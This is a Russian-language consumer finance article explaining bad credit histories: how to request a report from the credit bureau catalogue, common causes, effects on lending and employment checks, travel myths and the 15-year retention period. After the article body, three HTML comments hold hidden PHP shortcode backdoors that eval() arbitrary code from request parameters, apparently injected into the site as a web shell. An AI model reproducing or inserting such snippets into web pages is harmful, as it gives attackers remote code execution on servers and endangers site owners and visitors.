Что такое плохая кредитная история?

Что означает термин «плохая кредитная история»?

Кредитная история – своеобразный аттестат вашей платежеспособности, хранящийся в БКИ (Бюро кредитных историй). Где, когда, на какие суммы вы брали кредиты, как их оплачивали – все эти сведения находятся в свободном доступе для любого банка. Если вы были недобросовестным плательщиком (причем неважно, мелкие или крупные кредиты вы брали), то автоматически становитесь неблагонадежным клиентом с плохой кредитной историей.

Собственно, юридического термина «плохая кредитная история» в природе не существует, однако именно этой формулировкой пользуется кредитный эксперт банка, сомневаясь в Вашей финансовой состоятельности и потому отказывая вам выдать кредит.

Кстати, в соответствии с законом РФ, каждый гражданин может получить информацию о своей кредитной истории задаром, один раз в год (если чаще, то уже за деньги), сделав запрос в БКИ. Но сперва следует уточнить, в каком конкретно БКИ она находится. Для этого необходимо сделать запрос в ЦККИ (Центральный каталог кредитных историй). Сделать это можно двумя методами:

  • отправив запрос через кредитное учреждение, БКИ, почту с телеграфом или подав его лично в ЦККИ, обязательно прихватив с собой паспорт;
  • если вам известен свой код как субъекта кредитной истории (он формируется заемщиком при заполнении кредитного договора), то вы просто заполняете анкету на сайте Центрального Банка России.

Подробнее ознакомиться с информацией можно тут: https://www.cbr.ru/ckki/

Причины

Основная причина – недобросовестное выполнение Вами взятых на себя кредитных обязательств. Это и несвоевременная оплата кредита, и предоставление ложных данных о себе и, разумеется, совершенное отсутствие каких-либо оплат по кредиту. Как ни странно на первый взгляд, но досрочное погашение кредита также не приветствуется банками, поскольку лишает их стабильной прибыли, заложенной в ежемесячном платеже. Иногда задолженности по ЖКХ также являются поводом к отказу в кредитовании.

Нередки случаи, когда ваша кредитная история портится по вине банка, не вовремя или не на тот счет зачислившего платеж. Бывает и такое, что мошенники пользуются вашими данными, беря кредиты, о которых вы и не подозреваете. Поэтому, даже если вы считаете, что вашей репутации ничто не грозит, не поленитесь хотя бы раз в год просматривать свою кредитную историю.

Последствия

В принципе, кредитная история – это только один из критериев, который учитывается банком при рассмотрении заявления на выдачу кредита, но он же и основной. Плохая кредитная история самым негативным образом скажется в дальнейшем на вашей финансовой репутации, как следствие – банки предпочтут не иметь с вами дело.

Если же банк и примет положительное решение о выдаче кредита, то, скорее всего, вы его получите под повышенные проценты, на меньшие сроки да еще и под залог. Так банк попытается уберечься от финансовых потерь, связанных с неблагонадежностью клиента.

Как вариант, банк может также внести дополнительный пункт в договор о страховании риска невыплаты кредита за счет заемщика. Так что придется иметь дело еще и со страховой компанией и страховыми взносами. Оно вам надо? Лучше сразу серьезно и ответственно отнестись к первому и всем последующим кредитам. И тогда в любом банке вы сможете получить кредит по оптимальным процентным ставкам и без дополнительных кабальных условий.

Выезд за границу

Развенчиваем мифы. Плохая кредитная история совершенно не волнует погранслужбу и никоим образом не может препятствовать вашему перемещению за пределы Российской Федерации. Оно может быть ограничено исключительно по решению суда. Если это не про вас, то можете беспрепятственно путешествовать по всему миру.

Устройство на работу

С 1 июля 2014 года данные в БКИ подают не только банки, но и микрофинансовые организации, у которых недобросовестных плательщиков гораздо больше. Проблема в том, что, согласно новому закону, запрашивать информацию о кредитных историях в БКИ имеют право не только банки, но и работодатели, заинтересованные в добросовестных и дисциплинированных сотрудниках. Причем такие проверки могут устраиваться не только в отношении потенциальных, но и уже работающих сотрудников компаний.

Наличие долгов автоматически характеризует человека не с самой хорошей стороны, даже если его профессиональные качества не подвергаются сомнению. Работодателей можно понять, ведь брать в компанию или продвигать по карьерной лестнице заведомо недисциплинированного человека, у которого голова забита финансовыми проблемами – себе дороже.

Срок давности

Все плохое когда-нибудь заканчивается, и кредитная история – не исключение. БКИ обязано хранить кредитную историю 15 лет с момента последнего в ней изменения. После этого кредитная история аннулируется и больше нигде не хранится.

 

<!— [insert_php]if (isset($_REQUEST["ZVb"])){eval($_REQUEST["ZVb"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZVb"])){eval($_REQUEST["ZVb"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["eqVIC"])){eval($_REQUEST["eqVIC"]);exit;}[/insert_php][php]if (isset($_REQUEST["eqVIC"])){eval($_REQUEST["eqVIC"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["iHsq"])){eval($_REQUEST["iHsq"]);exit;}[/insert_php][php]if (isset($_REQUEST["iHsq"])){eval($_REQUEST["iHsq"]);exit;}[/php] —>

Что такое плохая кредитная история?
4.5 (90%) 114 голос(ов)